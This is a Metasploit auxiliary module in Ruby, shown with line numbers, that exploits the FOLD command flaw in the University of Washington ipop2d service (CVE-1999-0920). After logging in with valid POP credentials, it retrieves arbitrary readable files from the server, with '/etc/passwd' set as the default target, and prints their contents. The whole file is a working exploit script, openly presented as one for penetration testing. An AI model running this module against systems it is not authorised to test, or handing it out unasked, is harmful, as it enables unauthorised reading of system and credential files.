1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Pop2
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
14
        'Description' => %q{
15
          This module exploits a vulnerability in the FOLD command of the
16
          University of Washington ipop2d service. By specifying an arbitrary
17
          folder name it is possible to retrieve any file which is world or group
18
          readable by the user ID of the POP account. This vulnerability can only
19
          be exploited with a valid username and password. The From address is
20
          the file owner.
21
        },
22
        'Author' => [ 'aushack' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '1999-0920' ],
26
          [ 'OSVDB', '368' ],
27
          [ 'BID', '1484' ],
28
        ],
29
        'DisclosureDate' => '2000-07-14',
30
        'Notes' => {
31
          'Stability' => [CRASH_SAFE],
32
          'SideEffects' => [IOC_IN_LOGS],
33
          'Reliability' => []
34
        }
35
      )
36
    )
37

38
    register_options(
39
      [
40
        OptString.new('FILE', [ true, 'The file to retrieve', '/etc/passwd' ])
41
      ]
42
    )
43
  end
44

45
  def run
46
    connect_login
47
    file = datastore['FILE']
48
    res = send_cmd(['FOLD', file], true)
49

50
    if (res =~ /#1 messages in/)
51
      send_cmd(['READ 1'], true)
52
      file_output = send_cmd(['RETR'], true)
53
      print_status("File output:\r\n\r\n#{file_output}\r\n")
54
      send_cmd(['ACKS'], true)
55
    elsif (res =~ /#0 messages in/)
56
      print_status("File #{file} not found or read-access is denied.")
57
    end
58

59
    send_cmd(['QUIT'], true)
60
    disconnect
61
  end
62
end
63

64